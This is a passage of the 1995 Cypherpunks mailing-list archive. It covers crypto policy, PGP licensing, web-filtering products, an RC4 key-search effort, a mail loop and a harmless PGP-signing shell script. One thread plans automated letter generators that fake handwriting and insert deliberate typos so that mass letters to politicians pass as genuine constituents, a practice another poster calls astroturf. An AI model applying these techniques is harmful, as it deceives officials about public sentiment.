dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw== =5uit - -----END PGP PUBLIC KEY BLOCK----- * * * This campaign letter will be posted in a number of Usenet groups. I will also be turning it into a FAQ-formatted document, which will be posted monthly in the relevant groups and which will be available by anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If you come upon, or up with, any other ways in which we can help raise funds for Phil, drop me a line at hmiller at luc.edu and let me know, so that I can put it in the FAQ. [...] ====================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMAvXCSnIuJ1VakpnAQEicgP7Bn6ryN540LbdneN4PXyrODCzjy4fgW9b XP5PG8ledoro374I/ZuOJvL8HLcSNBRRrJE1MpIRykEHi8cXlpINLdsxqVlat+OI TxsEPntsH5WJJsaFb+xFdcAj681IEGFLJWdfx44SlH0eHVcsmQLmj5P3e/XUeIYr 1W3pyym0a0E= =bzs2 -----END PGP SIGNATURE----- From frissell at panix.com Tue Jul 18 09:07:31 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 18 Jul 95 09:07:31 PDT Subject: Free The World Web Server project.. :) Message-ID: <199507181508.LAA22050@panix.com> At 07:10 PM 7/16/95 -0500, David K. Merriman wrote: >> The web page would generate a random letter, allow the user to edit >>it, further (possibly offering the alternate phrases) before he clicks >>on the [Send] button. >> > >If someone in the DC area wants to set up such a system, I'll gladly donate >an Intel SatisFAXion 200 fax/modem, complete with manuals, etc. > >This would be a Good Thing, IMHO. The "Experiment in Remote Printing" had this idea about two years ago. They have well established, free, email to fax gateways around the world (including DC). See their WWW page: http://www.dis.org/fax/faxsend.html DCF "And that is called paying the Dane-geld; But weve proved it again and again, That if once you have paid him the Dane-geld You never get rid of the Dane." Rudyard Kipling From tcmay at sensemedia.net Tue Jul 18 09:28:07 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Tue, 18 Jul 95 09:28:07 PDT Subject: Automated Rant Generators and Letter Generators Message-ID: David Conrad told me he meant for this to go to the whole list, but only sent it to me by mistake. So here is his post. At 4:14 PM 7/18/95, David R. Conrad wrote: >Tim May writes: >>Bart's comments about using Knuth's typographic work are interesting, to >>the extent that letters need to look handwritten. In the Mac market, it's >>possible to send in some handwriting samples and get back a font that >>emulates the handwriting! > >I suppose the resulting font has only one form for each letter? (Although >I understand that when you send them a sample, you send several instances >of each letter; a friend was showing me an add for this.) The fact that >each letter is the same every time would be a giveaway. We need something >like Metafont, or at least choose from a number of different shapes. > >> ... So, the combination of >>handwriting fonts, automated rant generators (of varying rabidities), and >>fax capabilities gives a pretty good start. Using lots of handwriting >>samples, various other fonts, and a mix of styles in the letters will help. > >Another factor that would make it appear more authentic would be spelling >and grammar errors. The grammar errors could be built into the rant >generators (an occasional dangling modifier, an incomplete sentence or two); >spelling errors could be done by post-processing the output of the rantgens. >It's important to take into account the different types of spellos that >occur: commonly misspelled words (aquired, beleive); wrong homophone (their, >they're, there; two, to, too); transposed letters (transpoesd); near-misses >on qwerty keyboards (nesr-mosses); and words left out. > >-- >David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ >Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page >Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 >No, his mind is not for rent to any god or government. From bart at netcom.com Tue Jul 18 10:00:48 1995 From: bart at netcom.com (Harry Bartholomew) Date: Tue, 18 Jul 95 10:00:48 PDT Subject: Automated Rant Generators and Letter Generators In-Reply-To: Message-ID: <199507181659.JAA10311@netcom18.netcom.com> My motivation in suggesting the use of a pen-plotter to generate output was to make the letter appear to come from a flesh and blood human who doesn't do computers or even FAX. Somewhere, perhaps from Jim Warren or the EFF, I had heard that the pols payed attention to handwritten letters far more than FAXs or email or phone calls. The rant generator-to-postal mail gateway might give netters more leverage than we have now. From Michael at umlaw.demon.co.uk Tue Jul 18 10:27:54 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Tue, 18 Jul 95 10:27:54 PDT Subject: Root Causes Roots Message-ID: <2482@umlaw.demon.co.uk> Jim Ray asks what on earth I'm talking about the 9th amendment not applying to the right to write code, since people were using codes to protect their communications long before the passage of the bill of rights. I always understood "writing code" as in "cypherpuks write code" to mean computer code, that is FORTRAN, C++, assembler, perl or whatever. I understand "writing IN code" to be the use of cryptographic tools such as codes or cyphers. Thus my claim that the right to write IN code may have existed in the 1790s, but the right to write [computer] code could not (since there were no computers). Of course, I could be wrong about this, since however you define it, it's debateable whether I'd pass the code test to qualify as a cypherpunk, since I stopped writing code when I gave up programming for lawyering, and I didn't start writing in code when I started writing about codes. In any case it's a matter of definitions, not timelines. Note: I am not suggesting that the right to write code lacks constitutional protection; just that the protection wouldn't come from the 9th amendment. My views on the constitutional right to write IN code, which also does not rely on the 9th amendment, can be found in my Clipper paper, which Hal Abelson has kindly ported in Netscape friendly form to: http:// -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From hayden at krypton.mankato.msus.edu Tue Jul 18 10:48:26 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Tue, 18 Jul 95 10:48:26 PDT Subject: PINESIGN 2.0: A simple script for PGP signing Pine mail Message-ID: -----BEGIN PGP SIGNED MESSAGE----- After a couple of comments, I've updated Pinesign to a new version. This new version adds the ability to choose whether your ascii signature (ie $HOME/.signature) is added. Some mail servers get confused by extra text, so the ability to make sure nothing extra is added was requested. Basically, if you want to sign the message both digitally and asciilly (is that a word :-), just press return twice after you exit your composing editor. Otherwise, make the selections you want specific to the type of message you are sending. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #!/bin/sh # PINESIGN v2.0 # Written by: Robert A. Hayden # PINESIGN is a simple program that will allow you to automatically sign # your email and news messages composed with the Pine 3.89 mail reader. It # may also work with other mail and news programs, but it has not been # tested. # INSTRUCTIONS FOR CONFIGURING PINE # # You need to define the following options in Pine. This can be done # either via the SETUP options in the main menu of Pine, or via editing # the .pinerc. # # A) signature-file=" " (an empty space) # B) enable-alternate-editor-cmd # C) enable-alternate-editor-implicitly (optional but recommended) # D) signature-at-bottom # E) editor= # INSTRUCTIONS FOR CONFIGURING PINESIGN # # The PGP program must be in your path, and the PGPPATH environment # variable must be defined. See the PGP documentation for details. # # Double check that the first line of this program points to sh. # # Edit the SIGPATH and PINEEDITOR variables to point at your signature # (if any) and the editor you wish to use for your Pine mail. Default # signature will be the file .signature in your $HOME directory. # Default editor is pico -z -t. SIGPATH=$HOME/.signature-pine PINEEDITOR='pico -z -t' # INSTRUCTIONS FOR USING PINESIGN # # When you compose a message, you will compose your message as normal. # # When you exit your editor (control-X in Pico), you will receive a prompt # asking if you wish to add your signature file to the message. If you # respond with y, Y or just press return, your text signature file (often # $HOME/.signature) will be appended to your message. If you type # anything else, your message will not have your signature added. # # Next, you will be prompted as to whether you wish to PGP sign your # message. If you answer with y, Y or return, you will be prompted for your # PGP passphrase and then dumped back to the address/subject section of # Pine. If you type anything else, your message will not be signed. # # If you selected it to be added, your .signature file will be appended # AFTER your digital signature. # # If you have not defined your alternate editor to be run implicitly, you # will need to start it manually. If you do not run the alternate editor, # your .signature file will not be appended and you will also have to do # that manually. It is highly recommended that your define your alternate # editor to run implicitly. ### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ### $PINEEDITOR $1 clear echo -n "Would you like to add your ASCII signature to this message? [y] " read SIG echo " " echo -n "Would you like to sign this message with your PGP signature? [y] " read PGP if [ "$PGP" = "y" ] then pgp -sat +comment="PGP Signed with PineSign 2.0" $1 mv $1.asc $1 fi if [ "$PGP" = "Y" ] then pgp -sat +comment="PGP Signed with PineSign 2.0" $1 mv $1.asc $1 fi if [ "$PGP" = "" ] then pgp -sat +comment="PGP Signed with PineSign 2.0" $1 mv $1.asc $1 fi if [ "$SIG" = "y" ] then echo " " >> $1 cat $SIGPATH >> $1 fi if [ "$SIG" = "Y" ] then echo " " >> $1 cat $SIGPATH >> $1 fi if [ "$SIG" = "" ] then echo " " >> $1 cat $SIGPATH >> $1 fi -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.0 iQCVAwUBMAvz9DokqlyVGmCFAQHq6QP9FztYKCL9lV16HWwY3E6bRzyfpqwoqCag o7hvWivmc81uocYzo54fR5sz0pLCOAIAJL6f0ST+cRM/epdfgn/eEovCDQFZXelB 0I9mmhaUVpUdHFGfw8UD0XhuBuPWbsaNbMfYr07IVEddH8zqOKHANG0QLBmc8aVm 6btQbK8/MWE= =wfGX -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From rmtodd at servalan.servalan.com Tue Jul 18 11:03:53 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Tue, 18 Jul 95 11:03:53 PDT Subject: SurfWatch for employees (ugh) In-Reply-To: <199507180636.AA02056@ideath.goldenbear.com> Message-ID: In servalan.mailinglist.cypherpunks Greg Broiles writes: >-----BEGIN PGP SIGNED MESSAGE----- >Web usage by users subjected to its reign of terror. :) WebTrack >is priced at $7,500 with an annual subscription to its list of >interesting (err, forbidden) sites priced at $1,500. The article in the Bwahahahahaha. You gotta admire them for sheer marketing chutzpah. Any internet-connected company is likely to have a firewall, with all WWW access going thru a proxy on the firewall, and if I remember correctly, the CERN proxy httpd can be set to deny access to whichever URLs you want; I suspect the other proxy httpds have similar features. It takes hellacious chutzpah to ask $7,500 for software that does what you can get for free just by ftping to CERN's archives. Barnum's principle does imply that they'll probably find a buyer, though... As for the wider issues involved in using this in a commercial setting, I'll merely note that any corporation that treats its employees like children will end up with only employees with the mental age of children. This could explain why much of the commercial software I see these days acts like it was designed by a committee of retarded 10-year-olds. From terrell at sam.neosoft.com Tue Jul 18 11:27:29 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Tue, 18 Jul 95 11:27:29 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up Message-ID: <199507181832.NAA27559@sam.neosoft.com> > >>> >and, conspiracy theories non-withstanding, we the people do not govern >>> >America --we are only given a short list of politicians who have sold >>> >their soul to CFR's satanist inner circle. >>> >>> What's CFR? >>> >> >>Council on Foreign Relations. > >or Code of Federal Regulations. > or Cupherpunks Fuming and Ranting --buford From frissell at panix.com Tue Jul 18 11:51:21 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 18 Jul 95 11:51:21 PDT Subject: A Chronology on crypto bans Message-ID: <199507181850.OAA16134@panix.com> At 04:08 PM 7/16/95 -0400, Dave Banisar wrote: >Attempts to ban encryption 1977-1995 > >1977-1980 NSA Director Inman calls crypto born secret. Should be restricted. >Attempts to use Invention Secrecy Act of 1951 to patent inventions by >academic researchers. Attempts to use export control laws to limit >scientific discussion. >NSA Threatens NSF over grants for crypto studies. I hope that you emphasize the big impact of the IEEE/MIT/Scientific American/NSA/"A Proposal for a Public Key Encryption System" flap of 1978(?). An awful lot of people first learned about public-key/private-key algorithms because of that fight. DCF "You men can't fight in here. This is the War Room." -- Dr. Strangelove (or How I Learned to Stop Worrying and Love the Bomb). From wb8foz at nrk.com Tue Jul 18 11:52:22 1995 From: wb8foz at nrk.com (David Lesher) Date: Tue, 18 Jul 95 11:52:22 PDT Subject: NRC panel wants questions for Law Enforcement on crypto policy In-Reply-To: <9504192139.AA00379@toad.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In April, gnu asked: > Herb Lin called today to ask if the Cypherpunks could come up with a > list of questions for their panel to ask the law enforcement community > about crypto policy. They will be meeting with senior law enforcement > officials like FBI Director Freeh a week or so from now. Did we ever get any feedback on this? - -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMAw6JRqU5+N/mI7JAQEWQQP/UCKWs1m8cMbbG7pAk7CKPjKSAP9yJLvw m+vBFcC+TuFPrQSEjhK7s4qJnck3IzIXl7AmV70NFkr9Dc1Wni7YHkrfhx0nnRRe 7F131pKMNlgypyX/u3FaEHXtCxQV9R5IpYzBAGpvQ++3dzR7LdXcvS2I7kvcWf2G 6knV4KwHvp4= =9+ER -----END PGP SIGNATURE----- From attila at PrimeNet.Com Tue Jul 18 12:37:57 1995 From: attila at PrimeNet.Com (attila) Date: Tue, 18 Jul 95 12:37:57 PDT Subject: "Judgement Proof" and Putting Up or Shutting Up In-Reply-To: <199507181832.NAA27559@sam.neosoft.com> Message-ID: On Tue, 18 Jul 1995, Buford Terrell wrote: > > > >>> >and, conspiracy theories non-withstanding, we the people do not govern > >>> >America --we are only given a short list of politicians who have sold > >>> >their soul to CFR's satanist inner circle. > >>> > >>> What's CFR? > >>> > >> > >>Council on Foreign Relations. > > > >or Code of Federal Regulations. > > > or Cupherpunks Fuming and Ranting > > --buford > aw right! I like that last one --it fits! From sbryan at maroon.tc.umn.edu Tue Jul 18 12:50:18 1995 From: sbryan at maroon.tc.umn.edu (Steve Bryan) Date: Tue, 18 Jul 95 12:50:18 PDT Subject: SurfWatch for employees (ugh) Message-ID: At 11:36 pm 7/17/95, Greg Broiles wrote: [snip] >(Pedants need not point out that personal choice (and personal filtering) >are always appropriate, and indeed empowering. Neither WebTrack nor >NetSurf are marketed to help people subject themselves to a regime >of repression - they are intended and sold to allow the purchaser to >control what others (perceived as having fewer or no rights) will read [snip] There doesn't seem to be any suggestion that an employer will attempt to control net access that you pay and use yourself with your own equipment. What's the problem? As far as net access from work, that will naturally sort itself out. If unfettered access is beneficial to an enterprise then that will become apparent as "repressive" companies prove incapable of competing with "permissive" companies. +---------------------------------------------------------------------- |Steve Bryan Internet: sbryan at maroon.tc.umn.edu |Sexton Software CompuServe: 76545,527 |Minneapolis, MN 55415 Fax: (612) 929-1799 |PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D E1 8C A6 9B A9 BE 96 CB +---------------------------------------------------------------------- From Michael at umlaw.demon.co.uk Tue Jul 18 13:44:22 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Tue, 18 Jul 95 13:44:22 PDT Subject: Root Causes Roots Message-ID: <2515@umlaw.demon.co.uk> The ported URL of my clipper piece seems to have gone spare. He's another try: www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From shamrock at netcom.com Tue Jul 18 13:49:15 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 18 Jul 95 13:49:15 PDT Subject: RC4 crack Message-ID: <199507182047.QAA03926@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <21076.9507180656 at exe.dcs.exeter.ac.uk>, aba at atlas.ex.ac.uk wrote: >> Is there an easy way to integrate machines who are not on-net 24-7 >> into this protocol? Not all of us have dedicated lines.:) > >Well you could run a local master, ... or as you are using NT right? >you could use Andy's code when he adds socket support to interface to >masters. > >As to the problem of not having 24-7 connectivity, you could either >use the WWW page, or the server (it will do this anyway) will keep >re-trying to get a socket connect to the master until it suceeds, so >when you next go on-line ... wham it gets through again as >connectivity is resumed and says whatever it has been trying to say. >We need it to retry in case of network out (or horror) big master >falling over, until it gets resumed. On many machines that will mean that it will try to initiate a connection to the host. Please allow for a manual connect option. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAwdryoZzwIn1bdtAQHrDwGArifMl83/simhOGutmo8FhYgtCMZ+9g5E stSoeOysXuLCvv3EK3PTTUO4LdtPbhnn =rq/L -----END PGP SIGNATURE----- From perry at imsi.com Tue Jul 18 15:11:35 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 18 Jul 95 15:11:35 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <199507170016.TAA23019@arnet.arn.net> Message-ID: <9507170819.AA16469@snark.imsi.com> > Expecially if the form letter generated would be randomly selected >from parallel word streams. For example: [...] > You get the idea. Rather than spend five minutes writing something on your own you'd end up something that looks totally fake. I believe that what is going on would be discerned by a staffer in moments. Crap like this is called "astroturf" by staffers, to distinguish it from "grass roots" efforts. Perry From stewarts at ix.netcom.com Tue Jul 18 15:56:49 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 18 Jul 95 15:56:49 PDT Subject: SurfWatch for employees (ugh) Message-ID: <199507182255.PAA06275@ix5.ix.netcom.com> At 11:36 PM 7/17/95 -0700, Greg Broiles wrote: >Consistent with the trend towards treating employees like children, I'm not surprised someone sees a market for this. I've worked at a number of customer sites that block access to 900 numbers and local pay-per-call numbers, which also blocks access to Time-of-day and some vendors' customer-support numbers. >Webster Network Strategies has announced (but apparently has not >shipped) a product similar to SurfWatch but aimed at an employment >environment. The product is called "WebTrack" and supposedly supports >access lists of URLs, where access can be allowed to "all but these sites" >or "only to these sites". The product also can be configured to log all >Web usage by users subjected to its reign of terror. :) WebTrack >is priced at $7,500 with an annual subscription to I assume for that price that it's a gateway product, rather than a site license for a censored client (which would require sysadmins to go hunt down everybody's copy of netscape...) If so, I hope the system at least offers caching (to save on outside bandwidth requirements and download time), and has a fair amount of security so it doesn't become a hole in the firewall. >its list of interesting (err, forbidden) sites priced at $1,500. Wow! Folks have finally found a way to get paid for looking for porn on the net! :-) Surfwatch doesn't make it's censored list easily available (otherwise it'd probably get pirated, or used as an "interesting sites" index...), but apparently it blocks access to things other than just pornography - does Webster indicate what categories of stuff they're blocking? # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Tue Jul 18 15:56:54 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 18 Jul 95 15:56:54 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <199507182254.PAA06250@ix5.ix.netcom.com> At 09:36 AM 7/18/95 EDT, Jim Grubs, W8GRT wrote: >In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway. That doesn't help anything - folks asked Bidzos about that one. Of course, if your PGP version happens to output "2.7.1" as a version number, it's not abusing any trademarks.... # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From dat at ebt.com Tue Jul 18 16:01:37 1995 From: dat at ebt.com (David Taffs) Date: Tue, 18 Jul 95 16:01:37 PDT Subject: [shofar@Rt66.com: LEGISLATIVE WATCH AD] Message-ID: <9507182303.AA11619@veronica.EBT.COM> fyi... Date: Tue, 18 Jul 1995 08:35:45 -0600 (MDT) From: DJABS To: apologia-l at netcom.com Subject: LEGISLATIVE WATCH AD _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/_/_/ _/ _/ LEGISLATIVE WATCH ___________________________________________________________ Subscribe Direct >>>>>>>>>>>>>>>>>>>>>>>> shofar at RT66.com Interested in catching the political wave? "Legislative Watch" is an electronic newsletter with a focus on First Amendment concerns, religious liberty and other Constitutional issues. Subscribe direct at: shofar at RT66.com subject line: message line: ____________________________________________________________________ -- david taffs From stevenw at iglou.com Tue Jul 18 16:04:57 1995 From: stevenw at iglou.com (Steven Weller) Date: Tue, 18 Jul 95 16:04:57 PDT Subject: Commercenet document on cryptography Message-ID: I found the following on CommerceNet: http://www.commerce.net/information/position/position.062695.html Toward Enabling Secure Electronic Commerce: The Need for a Revised U.S. Cryptographic Policy by CommerceNet Network Services Working Group It seems to address all the issues. -- Steven Weller +1 502 454 0054 (voice) OS-9 Consultancy and Software +1 502 451 5935 (fax) Finger for public key 00 02 3C 2F 83 76 D3 77 2A 95 E8 90 94 9A 9D 74 http://iglou.com/windsorgrp stevenw at iglou.com or realtime at well.sf.ca.us From perry at imsi.com Tue Jul 18 16:18:30 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 18 Jul 95 16:18:30 PDT Subject: We appear... Message-ID: <9507182318.AA08206@webster.imsi.com> We appear to have an nntp/mail loop in progress. I believe the problem is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the mailing list (ugh!). .pm From rfb at lehman.com Tue Jul 18 16:32:39 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Tue, 18 Jul 95 16:32:39 PDT Subject: Is it legal for commercial companies to use PGP? In-Reply-To: <5ZsF9c6w165w@voxbox.norden1.com> Message-ID: <9507182330.AA23645@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: "Jim Grubs, W8GRT" Date: Tue, 18 Jul 95 09:36:51 EDT In practice, I'd probably buy Viacrypt for legal reasons but use PGP anyway. I'd be interesting in hearing some of the lawyers out there comment on this. While I know that I can test interoperability, I prefer using something that I compiled myself which I think is not an option with Viacrypt. This is not to say that I could swear that I understand all of the code that I compiled for the free versions of PGP, but (a) I have spent considerable time looking at the parts that were most interesting to me -- even translating some things to other programming languages and (b) I know that others have also examined the code and nobody has come up with anything terribly damning. Rick -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAxDnpNR+/jb2ZlNAQGSWgP/QpeKiOTHFo9x9OMqHyO0iyUoF0RPkZL3 iRnIWNNKCdRWPw4jc6j0m3toG7mnvBt5v/jK122nrbeZBbzEpxGgovA2imOKeD9e r09irO0Yo7G/T12yXgHOoaJ+69OPUhQFIUnPJGAJ2o5uEaLzRUlfDcsHQYtcx6sT aRCR9NsbDMM= =JsSF -----END PGP SIGNATURE----- -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From frogfarm at yakko.cs.wmich.edu Tue Jul 18 16:48:14 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Tue, 18 Jul 95 16:48:14 PDT Subject: SurfWatch for employees (ugh) In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com> Message-ID: <199507182354.TAA20153@yakko.cs.wmich.edu> Bill Stewart writes: > >its list of interesting (err, forbidden) sites priced at $1,500. > Wow! Folks have finally found a way to get paid for looking for porn on the > net! :-) > Surfwatch doesn't make it's censored list easily available (otherwise it'd > probably get pirated, or used as an "interesting sites" index...), but > apparently > it blocks access to things other than just pornography - does Webster > indicate what categories of stuff they're blocking? I think there's a definite need here. If some obliging soul can "blow the whistle" by posting to the net 1) Surfwatch's list of banned sites, and/or 2) the criteria Surfwatch uses when determining what sites to block, it would certainly be beneficial. At the very least, it would allow everyone to see what sort of information they believe is "harmful to minors". -- frogfarm at yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY imschira at nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy Damaged Justice | through Complex Mathematics! God's law PREVENTS Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None! From dat at ebt.com Tue Jul 18 16:53:03 1995 From: dat at ebt.com (David Taffs) Date: Tue, 18 Jul 95 16:53:03 PDT Subject: SurfWatch for employees (ugh) In-Reply-To: <199507182255.PAA06275@ix5.ix.netcom.com> Message-ID: <9507182352.AA11660@veronica.EBT.COM> Date: Tue, 18 Jul 1995 15:57:54 -0700 From: stewarts at ix.netcom.com (Bill Stewart) Cc: info at webster.com Sender: owner-cypherpunks at toad.com At 11:36 PM 7/17/95 -0700, Greg Broiles wrote: >Consistent with the trend towards treating employees like children, I'm not surprised someone sees a market for this. I've worked at a number of customer sites that block access to 900 numbers and local pay-per-call numbers, which also blocks access to Time-of-day and some vendors' customer-support numbers. Also 911 apparently, I've heard... -- david taffs From jim at acm.org Tue Jul 18 16:58:49 1995 From: jim at acm.org (Jim Gillogly) Date: Tue, 18 Jul 95 16:58:49 PDT Subject: Is it legal for commercial companies to use PGP? In-Reply-To: <9507182330.AA23645@cfdevx1.lehman.com> Message-ID: <199507182358.QAA10553@mycroft.rand.org> > Rick Busdiecker writes: > From: "Jim Grubs, W8GRT" > In practice, I'd probably buy Viacrypt for legal reasons but use > PGP anyway. >I'd be interesting in hearing some of the lawyers out there comment on >this. Does RSADSI count as having lawyers? So far as I know they have not commented in public about whether the ViaCrypt license is valid, but they have also not (to my knowledge) contested it. However, Jim Bidzos has explicitly said that it is not acceptable to buy a ViaCrypt license to cover your use of non-ViaCrypt PGP. Jim Gillogly Hevensday, 25 Afterlithe S.R. 1995, 23:53 From lmccarth at thor.cs.umass.edu Tue Jul 18 17:06:51 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Tue, 18 Jul 95 17:06:51 PDT Subject: We appear... In-Reply-To: <9507182318.AA08206@webster.imsi.com> Message-ID: <199507190006.UAA17547@thor.cs.umass.edu> .pm writes: > We appear to have an nntp/mail loop in progress. I believe the problem > is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the > mailing list (ugh!). Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for a week or more. I wrote to postmaster at cs.du.edu and it bounced from someone's personal mailbox (!) Duplicates of some of Bob Hayden's articles have been appearing via NNTP from krypton.mankato.msu.edu lately, too. From adwestro at ouray.cudenver.edu Tue Jul 18 17:27:21 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Tue, 18 Jul 95 17:27:21 PDT Subject: We appear... In-Reply-To: <9507182318.AA08206@webster.imsi.com> Message-ID: On Tue, 18 Jul 95, perry at imsi.com (Perry E. Metzger) wrote: > We appear to have an nntp/mail loop in progress. I believe the problem > is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the > mailing list (ugh!). Yes, and I suppose everyone got the message I stupidly sent to the list rather than to majordomo trying to figure this out...sorry. This list is supposed to be gated to a Nyx newsgroup via cypherpunks at cs.du.edu, as I recall, but is also being sent to cypherpunks at nyx.cs.du.edu, and to a couple of individual users: apoulter at nyx.cs.du.edu (Alan Poulter) cypherpunks at nyx.cs.du.edu jannis at nyx10.cs.du.edu cypherpunks at cs.du.edu I'm not sure if this is related to the crash; I was getting a few double postings from mnemosyne before the crash, but they seem to have increased. I've Cc:'d the sysadmin at DU, but removing the cypherpunks at nyx.cs.du.edu subscription might be in order. BTW, mnemosyne is the news server at DU... If it keeps up, I have no doubt someone will forge an unsubscribe request...:-) Anyway, maybe Hugh and/or Andrew can solve this in a less hackish manner... Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 From sdw at lig.net Tue Jul 18 17:29:22 1995 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 18 Jul 95 17:29:22 PDT Subject: Is it legal for commercial companies to use PGP? In-Reply-To: <199507182358.QAA10553@mycroft.rand.org> Message-ID: > > > > Rick Busdiecker writes: > > From: "Jim Grubs, W8GRT" > > > In practice, I'd probably buy Viacrypt for legal reasons but use > > PGP anyway. > > >I'd be interesting in hearing some of the lawyers out there comment on > >this. > > Does RSADSI count as having lawyers? So far as I know they have not > commented in public about whether the ViaCrypt license is valid, but > they have also not (to my knowledge) contested it. However, Jim Bidzos > has explicitly said that it is not acceptable to buy a ViaCrypt license > to cover your use of non-ViaCrypt PGP. > > Jim Gillogly > Hevensday, 25 Afterlithe S.R. 1995, 23:53 IANAL, but I find this position to be stretching the limits of credible grounds for a successful lawsuit. My reasoning is that most (all?) patent and copyright lawsuits are based on theft of services or other forms of lost income. If you collected a fee for a usage that was identical in function to one that actually took place, (or even close) I don't see how you could argue that any income was lost. Technically he can decide what to allow as the license 'owner'/controller, but that's different from having standing to sue. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From zinc at zifi.genetics.utah.edu Tue Jul 18 17:29:33 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Tue, 18 Jul 95 17:29:33 PDT Subject: We appear... In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu> Message-ID: On Tue, 18 Jul 1995, L. McCarthy wrote: > Date: Tue, 18 Jul 1995 20:06:40 -0400 (EDT) > From: L. McCarthy > To: Cypherpunks Mailing List > Cc: cypherpunks-owner at toad.com > Subject: Re: We appear... > > .pm writes: > > We appear to have an nntp/mail loop in progress. I believe the problem > > is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the > > mailing list (ugh!). > > Not exclusively, though -- I've been seeing sporadic stuff from mnemosyne for > a week or more. I wrote to postmaster at cs.du.edu and it bounced from someone's > personal mailbox (!) folks, the problem is this: the cypherpunks mailing list is read as a newsgroup on nyx.cs.du.edu. it seems they must have messed up their config recently otherwise we would have been seeing this for more than a year. anyway, i wrote the sysadmin at nyx.cs.du.edu (aburt at nyx...) so hopefully this will be taken care of soon. -pat patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the 